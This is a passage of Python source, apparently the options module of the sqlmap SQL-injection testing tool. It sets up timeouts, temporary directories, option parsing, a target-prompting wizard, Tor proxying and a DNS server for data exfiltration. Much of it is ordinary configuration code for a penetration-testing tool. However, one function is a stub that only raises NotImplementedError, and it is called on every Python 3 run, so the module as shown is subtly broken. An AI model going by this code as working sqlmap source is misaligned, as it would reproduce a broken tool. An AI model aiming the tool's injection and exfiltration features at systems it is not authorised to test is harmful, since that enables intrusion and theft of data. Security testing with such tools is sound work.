_urllib.parse.urlsplit(conf.url).netloc.split(':')[0]\n        except ValueError as ex:\n            errMsg = \"problem occurred while \"\n            errMsg += \"parsing an URL '%s' ('%s')\" % (conf.url, getSafeExString(ex))\n            raise SqlmapDataException(errMsg)\n\ndef _setHTTPTimeout():\n    \"\"\"\n    Set the HTTP timeout\n    \"\"\"\n\n    if conf.timeout:\n        debugMsg = \"setting the HTTP timeout\"\n        logger.debug(debugMsg)\n\n        conf.timeout = float(conf.timeout)\n\n        if conf.timeout < 3.0:\n            warnMsg = \"the minimum HTTP timeout is 3 seconds, sqlmap \"\n            warnMsg += \"will going to reset it\"\n            logger.warning(warnMsg)\n\n            conf.timeout = 3.0\n    else:\n        conf.timeout = 30.0\n\n    try:\n        socket.setdefaulttimeout(conf.timeout)\n    except OverflowError as ex:\n        raise SqlmapValueException(\"invalid value used for option '--timeout' ('%s')\" % getSafeExString(ex))\n\ndef _checkDependencies():\n    \"\"\"\n    Checks for missing dependencies.\n    \"\"\"\n\n    if conf.dependencies:\n        checkDependencies()\n\ndef _createHomeDirectories():\n    \"\"\"\n    Creates directories inside sqlmap's home directory\n    \"\"\"\n\n    if conf.get(\"purge\"):\n        return\n\n    for context in (\"output\", \"history\"):\n        directory = paths[\"SQLMAP_%s_PATH\" % getUnicode(context).upper()]   # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4363\n        try:\n            if not os.path.isdir(directory):\n                os.makedirs(directory)\n\n            _ = os.path.join(directory, randomStr())\n            open(_, \"w+b\").close()\n            os.remove(_)\n\n            if conf.get(\"outputDir\") and context == \"output\":\n                warnMsg = \"using '%s' as the %s directory\" % (directory, context)\n                logger.warning(warnMsg)\n        except (OSError, IOError) as ex:\n            tempDir = tempfile.mkdtemp(prefix=\"sqlmap%s\" % context)\n            warnMsg = \"unable to %s %s directory \" % (\"create\" if not os.path.isdir(directory) else \"write to the\", context)\n            warnMsg += \"'%s' (%s). \" % (directory, getUnicode(ex))\n            warnMsg += \"Using temporary directory '%s' instead\" % getUnicode(tempDir)\n            logger.warning(warnMsg)\n\n            paths[\"SQLMAP_%s_PATH\" % context.upper()] = tempDir\n\ndef _pympTempLeakPatch(tempDir):  # Cross-referenced function\n    raise NotImplementedError\n\ndef _createTemporaryDirectory():\n    \"\"\"\n    Creates temporary directory for this run.\n    \"\"\"\n\n    if conf.tmpDir:\n        try:\n            if not os.path.isdir(conf.tmpDir):\n                os.makedirs(conf.tmpDir)\n\n            _ = os.path.join(conf.tmpDir, randomStr())\n\n            open(_, \"w+b\").close()\n            os.remove(_)\n\n            tempfile.tempdir = conf.tmpDir\n\n            warnMsg = \"using '%s' as the temporary directory\" % conf.tmpDir\n            logger.warning(warnMsg)\n        except (OSError, IOError) as ex:\n            errMsg = \"there has been a problem while accessing \"\n            errMsg += \"temporary directory location(s) ('%s')\" % getSafeExString(ex)\n            raise SqlmapSystemException(errMsg)\n    else:\n        try:\n            if not os.path.isdir(tempfile.gettempdir()):\n                os.makedirs(tempfile.gettempdir())\n        except Exception as ex:\n            warnMsg = \"there has been a problem while accessing \"\n            warnMsg += \"system's temporary directory location(s) ('%s'). Please \" % getSafeExString(ex)\n            warnMsg += \"make sure that there is enough disk space left. If problem persists, \"\n            warnMsg += \"try to set environment variable 'TEMP' to a location \"\n            warnMsg += \"writeable by the current user\"\n            logger.warning(warnMsg)\n\n    if \"sqlmap\" not in (tempfile.tempdir or \"\") or conf.tmpDir and tempfile.tempdir == conf.tmpDir:\n        try:\n            tempfile.tempdir = tempfile.mkdtemp(prefix=\"sqlmap\", suffix=str(os.getpid()))\n        except:\n            tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, \"tmp\", \"sqlmap%s%d\" % (randomStr(6), os.getpid()))\n\n    kb.tempDir = tempfile.tempdir\n\n    if not os.path.isdir(tempfile.tempdir):\n        try:\n            os.makedirs(tempfile.tempdir)\n        except Exception as ex:\n            errMsg = \"there has been a problem while setting \"\n            errMsg += \"temporary directory location ('%s')\" % getSafeExString(ex)\n            raise SqlmapSystemException(errMsg)\n\n    if six.PY3:\n        _pympTempLeakPatch(kb.tempDir)\n\ndef _cleanupOptions():\n    \"\"\"\n    Cleanup configuration attributes.\n    \"\"\"\n\n    if conf.encoding:\n        try:\n            codecs.lookup(conf.encoding)\n        except LookupError:\n            errMsg = \"unknown encoding '%s'\" % conf.encoding\n            raise SqlmapValueException(errMsg)\n\n    debugMsg = \"cleaning up configuration parameters\"\n    logger.debug(debugMsg)\n\n    width = getConsoleWidth()\n\n    if conf.eta:\n        conf.progressWidth = width - 26\n    else:\n        conf.progressWidth = width - 46\n\n    for key, value in conf.items():\n        if value and any(key.endswith(_) for _ in (\"Path\", \"File\", \"Dir\")):\n            if isinstance(value, str):\n                conf[key] = safeExpandUser(value)\n\n    if conf.testParameter:\n        conf.testParameter = urldecode(conf.testParameter)\n        conf.testParameter = [_.strip() for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.testParameter)]\n    else:\n        conf.testParameter = []\n\n    if conf.ignoreCode:\n        if conf.ignoreCode == IGNORE_CODE_WILDCARD:\n            conf.ignoreCode = xrange(0, 1000)\n        else:\n            try:\n                conf.ignoreCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.ignoreCode)]\n            except ValueError:\n                errMsg = \"options '--ignore-code' should contain a list of integer values or a wildcard value '%s'\" % IGNORE_CODE_WILDCARD\n                raise SqlmapSyntaxException(errMsg)\n    else:\n        conf.ignoreCode = []\n\n    if conf.paramFilter:\n        conf.paramFilter = [_.strip() for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.paramFilter.upper())]\n    else:\n        conf.paramFilter = []\n\n    if conf.base64Parameter:\n        conf.base64Parameter = urldecode(conf.base64Parameter)\n        conf.base64Parameter = conf.base64Parameter.strip()\n        conf.base64Parameter = re.split(PARAMETER_SPLITTING_REGEX, conf.base64Parameter)\n    else:\n        conf.base64Parameter = []\n\n    if conf.agent:\n        conf.agent = re.sub(r\"[\\r\\n]\", \"\", conf.agent)\n\n    if conf.user:\n        conf.user = conf.user.replace(\" \", \"\")\n\n    if conf.rParam:\n        if all(_ in conf.rParam for _ in ('=', ',')):\n            original = conf.rParam\n            conf.rParam = []\n            for part in original.split(';'):\n                if '=' in part:\n                    left, right = part.split('=', 1)\n                    conf.rParam.append(left)\n                    kb.randomPool[left] = filterNone(_.strip() for _ in right.split(','))\n                else:\n                    conf.rParam.append(part)\n        else:\n            conf.rParam = conf.rParam.replace(\" \", \"\")\n            conf.rParam = re.split(PARAMETER_SPLITTING_REGEX, conf.rParam)\n    else:\n        conf.rParam = []\n\n    if conf.paramDel:\n        conf.paramDel = decodeStringEscape(conf.paramDel)\n\n    if conf.skip:\n        conf.skip = conf.skip.replace(\" \", \"\")\n        conf.skip = re.split(PARAMETER_SPLITTING_REGEX, conf.skip)\n    else:\n        conf.skip = []\n\n    if conf.cookie:\n        conf.cookie = re.sub(r\"[\\r\\n]\", \"\", conf.cookie)\n\n    if conf.delay:\n        conf.delay = float(conf.delay)\n\n    if conf.url:\n        conf.url = conf.url.strip().lstrip('/')\n        if not re.search(r\"\\A\\w+://\", conf.url):\n            conf.url = \"http://%s\" % conf.url\n\n    if conf.fileRead:\n        conf.fileRead = ntToPosixSlashes(normalizePath(conf.fileRead))\n\n    if conf.fileWrite:\n        conf.fileWrite = ntToPosixSlashes(normalizePath(conf.fileWrite))\n\n    if conf.fileDest:\n        conf.fileDest = ntToPosixSlashes(normalizePath(conf.fileDest))\n\n    if conf.msfPath:\n        conf.msfPath = ntToPosixSlashes(normalizePath(conf.msfPath))\n\n    if conf.tmpPath:\n        conf.tmpPath = ntToPosixSlashes(normalizePath(conf.tmpPath))\n\n    if any((conf.googleDork, conf.logFile, conf.bulkFile, conf.forms, conf.crawlDepth, conf.stdinPipe)):\n        conf.multipleTargets = True\n\n    if conf.optimize:\n        setOptimize()\n\n    if conf.os:\n        conf.os = conf.os.capitalize()\n\n    if conf.forceDbms:\n        conf.dbms = conf.forceDbms\n\n    if conf.dbms:\n        kb.dbmsFilter = []\n        for _ in conf.dbms.split(','):\n            for dbms, aliases in DBMS_ALIASES:\n                if _.strip().lower() in aliases:\n                    kb.dbmsFilter.append(dbms)\n                    conf.dbms = dbms if conf.dbms and ',' not in conf.dbms else None\n                    break\n\n    if conf.testFilter:\n        conf.testFilter = conf.testFilter.strip('*+')\n        conf.testFilter = re.sub(r\"([^.])([*+])\", r\"\\g<1>.\\g<2>\", conf.testFilter)\n\n        try:\n            re.compile(conf.testFilter)\n        except re.error:\n            conf.testFilter = re.escape(conf.testFilter)\n\n    if conf.csrfToken:\n        original = conf.csrfToken\n        try:\n            re.compile(conf.csrfToken)\n\n            if re.escape(conf.csrfToken) != conf.csrfToken:\n                message = \"provided value for option '--csrf-token' is a regular expression? [y/N] \"\n                if not readInput(message, default='N', boolean=True):\n                    conf.csrfToken = re.escape(conf.csrfToken)\n        except re.error:\n            conf.csrfToken = re.escape(conf.csrfToken)\n        finally:\n            class _(six.text_type):\n                pass\n            conf.csrfToken = _(conf.csrfToken)\n            conf.csrfToken._original = original\n\n    if conf.testSkip:\n        conf.testSkip = conf.testSkip.strip('*+')\n        conf.testSkip = re.sub(r\"([^.])([*+])\", r\"\\g<1>.\\g<2>\", conf.testSkip)\n\n        try:\n            re.compile(conf.testSkip)\n        except re.error:\n            conf.testSkip = re.escape(conf.testSkip)\n\n    if \"timeSec\" not in kb.explicitSettings:\n        if conf.tor:\n            conf.timeSec = 2 * conf.timeSec\n            kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE\n\n            warnMsg = \"increasing default value for \"\n            warnMsg += \"option '--time-sec' to %d because \" % conf.timeSec\n            warnMsg += \"switch '--tor' was provided\"\n            logger.warning(warnMsg)\n    else:\n        kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE\n\n    if conf.retries:\n        conf.retries = min(conf.retries, MAX_CONNECT_RETRIES)\n\n    if conf.url:\n        match = re.search(r\"\\A(\\w+://)?([^/@?]+)@\", conf.url)\n        if match:\n            credentials = match.group(2)\n            conf.url = conf.url.replace(\"%s@\" % credentials, \"\", 1)\n\n            conf.authType = AUTH_TYPE.BASIC\n            conf.authCred = credentials if ':' in credentials else \"%s:\" % credentials\n\n    if conf.code:\n        conf.code = int(conf.code)\n\n    if conf.csvDel:\n        conf.csvDel = decodeStringEscape(conf.csvDel)\n\n    if conf.torPort and hasattr(conf.torPort, \"isdigit\") and conf.torPort.isdigit():\n        conf.torPort = int(conf.torPort)\n\n    if conf.torType:\n        conf.torType = conf.torType.upper()\n\n    if conf.outputDir:\n        paths.SQLMAP_OUTPUT_PATH = os.path.realpath(os.path.expanduser(conf.outputDir))\n        setPaths(paths.SQLMAP_ROOT_PATH)\n\n    if conf.string:\n        conf.string = decodeStringEscape(conf.string)\n\n    if conf.getAll:\n        for _ in WIZARD.ALL:\n            conf.__setitem__(_, True)\n\n    if conf.noCast:\n        DUMP_REPLACEMENTS.clear()\n\n    if conf.dumpFormat:\n        conf.dumpFormat = conf.dumpFormat.upper()\n\n    if conf.torType:\n        conf.torType = conf.torType.upper()\n\n    if conf.col:\n        conf.col = re.sub(r\"\\s*,\\s*\", ',', conf.col)\n\n    if conf.exclude:\n        regex = False\n        original = conf.exclude\n\n        if any(_ in conf.exclude for _ in ('+', '*')):\n            try:\n                re.compile(conf.exclude)\n            except re.error:\n                pass\n            else:\n                regex = True\n\n        if not regex:\n            conf.exclude = re.sub(r\"\\s*,\\s*\", ',', conf.exclude)\n            conf.exclude = r\"\\A%s\\Z\" % '|'.join(re.escape(_) for _ in conf.exclude.split(','))\n        else:\n            conf.exclude = re.sub(r\"(\\w+)\\$\", r\"\\g<1>\\$\", conf.exclude)\n\n        class _(six.text_type):\n            pass\n\n        conf.exclude = _(conf.exclude)\n        conf.exclude._original = original\n\n    if conf.binaryFields:\n        conf.binaryFields = conf.binaryFields.replace(\" \", \"\")\n        conf.binaryFields = re.split(PARAMETER_SPLITTING_REGEX, conf.binaryFields)\n\n    envProxy = max(os.environ.get(_, \"\") for _ in PROXY_ENVIRONMENT_VARIABLES)\n    if re.search(r\"\\A(https?|socks[45])://.+:\\d+\\Z\", envProxy) and conf.proxy is None:\n        debugMsg = \"using environment proxy '%s'\" % envProxy\n        logger.debug(debugMsg)\n\n        conf.proxy = envProxy\n\n    if any((conf.proxy, conf.proxyFile, conf.tor)):\n        conf.disablePrecon = True\n\n    if conf.dummy:\n        conf.batch = True\n\n    threadData = getCurrentThreadData()\n    threadData.reset()\n\ndef _cleanupEnvironment():\n    \"\"\"\n    Cleanup environment (e.g. from leftovers after --shell).\n    \"\"\"\n\n    if issubclass(_http_client.socket.socket, socks.socksocket):\n        socks.unwrapmodule(_http_client)\n\n    if hasattr(socket, \"_ready\"):\n        socket._ready.clear()\n\ndef _purge():\n    \"\"\"\n    Safely removes (purges) sqlmap data directory.\n    \"\"\"\n\n    if conf.purge:\n        purge(paths.SQLMAP_HOME_PATH)\n\ndef _setConfAttributes():\n    \"\"\"\n    This function set some needed attributes into the configuration\n    singleton.\n    \"\"\"\n\n    debugMsg = \"initializing the configuration\"\n    logger.debug(debugMsg)\n\n    conf.authUsername = None\n    conf.authPassword = None\n    conf.boundaries = []\n    conf.cj = None\n    conf.dbmsConnector = None\n    conf.dbmsHandler = None\n    conf.dnsServer = None\n    conf.dumpPath = None\n    conf.hashDB = None\n    conf.hashDBFile = None\n    conf.httpCollector = None\n    conf.httpHeaders = []\n    conf.hostname = None\n    conf.ipv6 = False\n    conf.multipleTargets = False\n    conf.outputPath = None\n    conf.paramDict = {}\n    conf.parameters = {}\n    conf.path = None\n    conf.port = None\n    conf.proxyList = None\n    conf.resultsFP = None\n    conf.scheme = None\n    conf.tests = []\n    conf.trafficFP = None\n    conf.HARCollectorFactory = None\n    conf.fileWriteType = None\n\ndef _setKnowledgeBaseAttributes(flushAll=True):\n    \"\"\"\n    This function set some needed attributes into the knowledge base\n    singleton.\n    \"\"\"\n\n    debugMsg = \"initializing the knowledge base\"\n    logger.debug(debugMsg)\n\n    kb.absFilePaths = set()\n    kb.adjustTimeDelay = None\n    kb.alerted = False\n    kb.aliasName = randomStr()\n    kb.alwaysRefresh = None\n    kb.arch = None\n    kb.authHeader = None\n    kb.bannerFp = AttribDict()\n    kb.base64Originals = {}\n    kb.binaryField = False\n    kb.browserVerification = None\n\n    kb.brute = AttribDict({\"tables\": [], \"columns\": []})\n    kb.bruteMode = False\n\n    kb.cache = AttribDict()\n    kb.cache.addrinfo = {}\n    kb.cache.content = {}\n    kb.cache.comparison = {}\n    kb.cache.encoding = {}\n    kb.cache.alphaBoundaries = None\n    kb.cache.hashRegex = None\n    kb.cache.intBoundaries = None\n    kb.cache.parsedDbms = {}\n    kb.cache.regex = {}\n    kb.cache.stdev = {}\n\n    kb.captchaDetected = None\n\n    kb.chars = AttribDict()\n    kb.chars.delimiter = randomStr(length=6, lowercase=True)\n    kb.chars.start = \"%s%s%s\" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)\n    kb.chars.stop = \"%s%s%s\" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)\n    kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = (\"%s%s%s\" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True))\n\n    kb.choices = AttribDict(keycheck=False)\n    kb.codePage = None\n    kb.commonOutputs = None\n    kb.connErrorCounter = 0\n    kb.copyExecTest = None\n    kb.counters = {}\n    kb.customInjectionMark = CUSTOM_INJECTION_MARK_CHAR\n    kb.data = AttribDict()\n    kb.dataOutputFlag = False\n\n    # Active back-end DBMS fingerprint\n    kb.dbms = None\n    kb.dbmsFilter = []\n    kb.dbmsVersion = [UNKNOWN_DBMS_VERSION]\n\n    kb.delayCandidates = TIME_DELAY_CANDIDATES * [0]\n    kb.dep = None\n    kb.disableHtmlDecoding = False\n    kb.disableShiftTable = False\n    kb.dnsMode = False\n    kb.dnsTest = None\n    kb.docRoot = None\n    kb.droppingRequests = False\n    kb.dumpColumns = None\n    kb.dumpTable = None\n    kb.dumpKeyboardInterrupt = False\n    kb.dynamicMarkings = []\n    kb.dynamicParameter = False\n    kb.endDetection = False\n    kb.explicitSettings = set()\n    kb.extendTests = None\n    kb.errorChunkLength = None\n    kb.errorIsNone = True\n    kb.falsePositives = []\n    kb.fileReadMode = False\n    kb.fingerprinted = False\n    kb.followSitemapRecursion = None\n    kb.forcedDbms = None\n    kb.forcePartialUnion = False\n    kb.forceThreads = None\n    kb.forceWhere = None\n    kb.forkNote = None\n    kb.futileUnion = None\n    kb.fuzzUnionTest = None\n    kb.heavilyDynamic = False\n    kb.headersFile = None\n    kb.headersFp = {}\n    kb.heuristicDbms = None\n    kb.heuristicExtendedDbms = None\n    kb.heuristicMode = False\n    kb.heuristicPage = False\n    kb.heuristicTest = None\n    kb.hintValue = \"\"\n    kb.htmlFp = []\n    kb.httpErrorCodes = {}\n    kb.inferenceMode = False\n    kb.ignoreCasted = None\n    kb.ignoreNotFound = False\n    kb.ignoreTimeout = False\n    kb.identifiedWafs = set()\n    kb.injection = InjectionDict()\n    kb.injections = []\n    kb.jsonAggMode = False\n    kb.laggingChecked = False\n    kb.lastParserStatus = None\n\n    kb.locks = AttribDict()\n    for _ in (\"cache\", \"connError\", \"count\", \"handlers\", \"hint\", \"index\", \"io\", \"limit\", \"liveCookies\", \"log\", \"socket\", \"redirect\", \"request\", \"value\"):\n        kb.locks[_] = threading.Lock()\n\n    kb.matchRatio = None\n    kb.maxConnectionsFlag = False\n    kb.mergeCookies = None\n    kb.multiThreadMode = False\n    kb.multipleCtrlC = False\n    kb.negativeLogic = False\n    kb.nchar = True\n    kb.nullConnection = None\n    kb.oldMsf = None\n    kb.orderByColumns = None\n    kb.originalCode = None\n    kb.originalPage = None\n    kb.originalPageTime = None\n    kb.originalTimeDelay = None\n    kb.originalUrls = dict()\n\n    # Back-end DBMS underlying operating system fingerprint via banner (-b)\n    # parsing\n    kb.os = None\n    kb.osVersion = None\n    kb.osSP = None\n\n    kb.pageCompress = True\n    kb.pageTemplate = None\n    kb.pageTemplates = dict()\n    kb.pageEncoding = DEFAULT_PAGE_ENCODING\n    kb.pageStable = None\n    kb.partRun = None\n    kb.permissionFlag = False\n    kb.place = None\n    kb.postHint = None\n    kb.postSpaceToPlus = False\n    kb.postUrlEncode = True\n    kb.prependFlag = False\n    kb.processResponseCounter = 0\n    kb.previousMethod = None\n    kb.processUserMarks = None\n    kb.proxyAuthHeader = None\n    kb.queryCounter = 0\n    kb.randomPool = {}\n    kb.reflectiveMechanism = True\n    kb.reflectiveCounters = {REFLECTIVE_COUNTER.MISS: 0, REFLECTIVE_COUNTER.HIT: 0}\n    kb.requestCounter = 0\n    kb.resendPostOnRedirect = None\n    kb.resolutionDbms = None\n    kb.responseTimes = {}\n    kb.responseTimeMode = None\n    kb.responseTimePayload = None\n    kb.resumeValues = True\n    kb.safeCharEncode = False\n    kb.safeReq = AttribDict()\n    kb.secondReq = None\n    kb.serverHeader = None\n    kb.singleLogFlags = set()\n    kb.skipSeqMatcher = False\n    kb.smokeMode = False\n    kb.reduceTests = None\n    kb.sslSuccess = False\n    kb.stickyDBMS = False\n    kb.suppressResumeInfo = False\n    kb.tableFrom = None\n    kb.technique = None\n    kb.tempDir = None\n    kb.testMode = False\n    kb.testOnlyCustom = False\n    kb.testQueryCount = 0\n    kb.testType = None\n    kb.threadContinue = True\n    kb.threadException = False\n    kb.tlsSNI = {}\n    kb.uChar = NULL\n    kb.udfFail = False\n    kb.unionDuplicates = False\n    kb.unionTemplate = None\n    kb.webSocketRecvCount = None\n    kb.wizardMode = False\n    kb.xpCmdshellAvailable = False\n\n    if flushAll:\n        kb.checkSitemap = None\n        kb.headerPaths = {}\n        kb.keywords = set(getFileItems(paths.SQL_KEYWORDS))\n        kb.lastCtrlCTime = None\n        kb.normalizeCrawlingChoice = None\n        kb.passwordMgr = None\n        kb.postprocessFunctions = []\n        kb.preprocessFunctions = []\n        kb.skipVulnHost = None\n        kb.storeCrawlingChoice = None\n        kb.tamperFunctions = []\n        kb.targets = OrderedSet()\n        kb.testedParams = set()\n        kb.userAgents = None\n        kb.vainRun = True\n        kb.vulnHosts = set()\n        kb.wafFunctions = []\n        kb.wordlists = None\n\ndef _useWizardInterface():\n    \"\"\"\n    Presents simple wizard interface for beginner users\n    \"\"\"\n\n    if not conf.wizard:\n        return\n\n    logger.info(\"starting wizard interface\")\n\n    while not conf.url:\n        message = \"Please enter full target URL (-u): \"\n        conf.url = readInput(message, default=None, checkBatch=False)\n\n    message = \"%s data (--data) [Enter for None]: \" % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST)\n    conf.data = readInput(message, default=None)\n\n    if not (any('=' in _ for _ in (conf.url, conf.data)) or '*' in conf.url):\n        warnMsg = \"no GET and/or %s parameter(s) found for testing \" % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST)\n        warnMsg += \"(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). \"\n        if not conf.crawlDepth and not conf.forms:\n            warnMsg += \"Will search for forms\"\n            conf.forms = True\n        logger.warning(warnMsg)\n\n    choice = None\n\n    while choice is None or choice not in (\"\", \"1\", \"2\", \"3\"):\n        message = \"Injection difficulty (--level/--risk). Please choose:\\n\"\n        message += \"[1] Normal (default)\\n[2] Medium\\n[3] Hard\"\n        choice = readInput(message, default='1')\n\n        if choice == '2':\n            conf.risk = 2\n            conf.level = 3\n        elif choice == '3':\n            conf.risk = 3\n            conf.level = 5\n        else:\n            conf.risk = 1\n            conf.level = 1\n\n    if not conf.getAll:\n        choice = None\n\n        while choice is None or choice not in (\"\", \"1\", \"2\", \"3\"):\n            message = \"Enumeration (--banner/--current-user/etc). Please choose:\\n\"\n            message += \"[1] Basic (default)\\n[2] Intermediate\\n[3] All\"\n            choice = readInput(message, default='1')\n\n            if choice == '2':\n                options = WIZARD.INTERMEDIATE\n            elif choice == '3':\n                options = WIZARD.ALL\n            else:\n                options = WIZARD.BASIC\n\n            for _ in options:\n                conf.__setitem__(_, True)\n\n    logger.debug(\"muting sqlmap.. it will do the magic for you\")\n    conf.verbose = 0\n\n    conf.batch = True\n    conf.threads = 4\n\n    dataToStdout(\"\\nsqlmap is running, please wait..\\n\\n\")\n\n    kb.wizardMode = True\n\ndef _saveConfig():\n    \"\"\"\n    Saves the command line options to a sqlmap configuration INI file\n    Format.\n    \"\"\"\n\n    if not conf.saveConfig:\n        return\n\n    debugMsg = \"saving command line options to a sqlmap configuration INI file\"\n    logger.debug(debugMsg)\n\n    saveConfig(conf, conf.saveConfig)\n\n    infoMsg = \"saved command line options to the configuration file '%s'\" % conf.saveConfig\n    logger.info(infoMsg)\n\ndef setVerbosity():\n    \"\"\"\n    This function set the verbosity of sqlmap output messages.\n    \"\"\"\n\n    if conf.verbose is None:\n        conf.verbose = 1\n\n    conf.verbose = int(conf.verbose)\n\n    if conf.verbose == 0:\n        logger.setLevel(logging.ERROR)\n    elif conf.verbose == 1:\n        logger.setLevel(logging.INFO)\n    elif conf.verbose > 2 and conf.eta:\n        conf.verbose = 2\n        logger.setLevel(logging.DEBUG)\n    elif conf.verbose == 2:\n        logger.setLevel(logging.DEBUG)\n    elif conf.verbose == 3:\n        logger.setLevel(CUSTOM_LOGGING.PAYLOAD)\n    elif conf.verbose == 4:\n        logger.setLevel(CUSTOM_LOGGING.TRAFFIC_OUT)\n    elif conf.verbose >= 5:\n        logger.setLevel(CUSTOM_LOGGING.TRAFFIC_IN)\n\ndef _normalizeOptions(inputOptions):\n    \"\"\"\n    Sets proper option types\n    \"\"\"\n\n    types_ = {}\n    for group in optDict.keys():\n        types_.update(optDict[group])\n\n    for key in inputOptions:\n        if key in types_:\n            value = inputOptions[key]\n            if value is None:\n                continue\n\n            type_ = types_[key]\n            if type_ and isinstance(type_, tuple):\n                type_ = type_[0]\n\n            if type_ == OPTION_TYPE.BOOLEAN:\n                try:\n                    value = bool(value)\n                except (TypeError, ValueError):\n                    value = False\n            elif type_ == OPTION_TYPE.INTEGER:\n                try:\n                    value = int(value)\n                except (TypeError, ValueError):\n                    value = 0\n            elif type_ == OPTION_TYPE.FLOAT:\n                try:\n                    value = float(value)\n                except (TypeError, ValueError):\n                    value = 0.0\n\n            inputOptions[key] = value\n\ndef _mergeOptions(inputOptions, overrideOptions):\n    \"\"\"\n    Merge command line options with configuration file and default options.\n\n    @param inputOptions: optparse object with command line options.\n    @type inputOptions: C{instance}\n    \"\"\"\n\n    if inputOptions.configFile:\n        configFileParser(inputOptions.configFile)\n\n    if hasattr(inputOptions, \"items\"):\n        inputOptionsItems = inputOptions.items()\n    else:\n        inputOptionsItems = inputOptions.__dict__.items()\n\n    for key, value in inputOptionsItems:\n        if key not in conf or value not in (None, False) or overrideOptions:\n            conf[key] = value\n\n    if not conf.api:\n        for key, value in conf.items():\n            if value is not None:\n                kb.explicitSettings.add(key)\n\n    for key, value in defaults.items():\n        if hasattr(conf, key) and conf[key] is None:\n            conf[key] = value\n\n            if conf.unstable:\n                if key in (\"timeSec\", \"retries\", \"timeout\"):\n                    conf[key] *= 2\n\n    if conf.unstable:\n        conf.forcePartial = True\n\n    lut = {}\n    for group in optDict.keys():\n        lut.update((_.upper(), _) for _ in optDict[group])\n\n    envOptions = {}\n    for key, value in os.environ.items():\n        if key.upper().startswith(SQLMAP_ENVIRONMENT_PREFIX):\n            _ = key[len(SQLMAP_ENVIRONMENT_PREFIX):].upper()\n            if _ in lut:\n                envOptions[lut[_]] = value\n\n    if envOptions:\n        _normalizeOptions(envOptions)\n        for key, value in envOptions.items():\n            conf[key] = value\n\n    mergedOptions.update(conf)\n\ndef _setTrafficOutputFP():\n    if conf.trafficFile:\n        infoMsg = \"setting file for logging HTTP traffic\"\n        logger.info(infoMsg)\n\n        conf.trafficFP = openFile(conf.trafficFile, \"w+\")\n\ndef _setupHTTPCollector():\n    if not conf.harFile:\n        return\n\n    conf.httpCollector = HTTPCollectorFactory(conf.harFile).create()\n\ndef _setDNSServer():\n    if not conf.dnsDomain:\n        return\n\n    infoMsg = \"setting up DNS server instance\"\n    logger.info(infoMsg)\n\n    isAdmin = runningAsAdmin()\n\n    if isAdmin:\n        try:\n            conf.dnsServer = DNSServer()\n            conf.dnsServer.run()\n        except socket.error as ex:\n            errMsg = \"there was an error while setting up \"\n            errMsg += \"DNS server instance ('%s')\" % getSafeExString(ex)\n            raise SqlmapGenericException(errMsg)\n    else:\n        errMsg = \"you need to run sqlmap as an administrator \"\n        errMsg += \"if you want to perform a DNS data exfiltration attack \"\n        errMsg += \"as it will need to listen on privileged UDP port 53 \"\n        errMsg += \"for incoming address resolution attempts\"\n        raise SqlmapMissingPrivileges(errMsg)\n\ndef _setProxyList():\n    if not conf.proxyFile:\n        return\n\n    conf.proxyList = []\n    for match in re.finditer(r\"(?i)((http[^:]*|socks[^:]*)://)?([\\w\\-.]+):(\\d+)\", readCachedFileContent(conf.proxyFile)):\n        _, type_, address, port = match.groups()\n        conf.proxyList.append(\"%s://%s:%s\" % (type_ or \"http\", address, port))\n\ndef _setTorProxySettings():\n    if not conf.tor:\n        return\n\n    if conf.torType == PROXY_TYPE.HTTP:\n        _setTorHttpProxySettings()\n    else:\n        _setTorSocksProxySettings()\n\ndef _setTorHttpProxySettings():\n    infoMsg = \"setting Tor HTTP proxy settings\"\n    logger.info(infoMsg)\n\n    port = findLocalPort(DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,))\n\n    if port:\n        conf.proxy = \"http://%s:%d\" % (LOCALHOST, port)\n    else:\n        errMsg = \"can't establish connection with the Tor HTTP proxy. \"\n        errMsg += \"Please make sure that you have Tor (bundle) installed and setup \"\n        errMsg += \"so you could be able to successfully use switch '--tor' \"\n        raise SqlmapConnectionException(errMsg)\n\n    if not conf.checkTor:\n        warnMsg = \"use switch '--check-tor' at \"\n        warnMsg += \"your own convenience when accessing \"\n        warnMsg += \"Tor anonymizing network because of \"\n        warnMsg += \"known issues with default settings of various 'bundles' \"\n        warnMsg += \"(e.g. Vidalia)\"\n        logger.warning(warnMsg)\n\ndef _setTorSocksProxySettings():\n    infoMsg = \"setting Tor SOCKS proxy settings\"\n    logger.info(infoMsg)\n\n    port = findLocalPort(DEFAULT_TOR_SOCKS_PORTS if not conf.torPort else (conf.torPort,))\n\n    if not port:\n        errMsg = \"can't establish connection with the Tor SOCKS proxy. \"\n        errMsg += \"Please make sure that you have Tor service installed and setup \"\n        errMsg += \"so you could be able to successfully use switch '--tor' \"\n        raise SqlmapConnectionException(errMsg)\n\n    # SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29)\n    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, port)\n    socks.wrapmodule(_http_client)\n\ndef _setHttpChunked():\n    if conf.chunked and conf.data:\n        if hasattr(_http_client.HTTPConnection, \"_set_content_length\"):\n            _http_client.HTTPConnection._set_content_length = lambda self, *args, **kwargs: None\n        else:\n            def putheader(self, header, *values):\n                if header != HTTP_HEADER.CONTENT_LENGTH:\n                    self._putheader(header, *values)\n\n            if not hasattr(_http_client.HTTPConnection, \"_putheader\"):\n                _http_client.HTTPConnection._putheader = 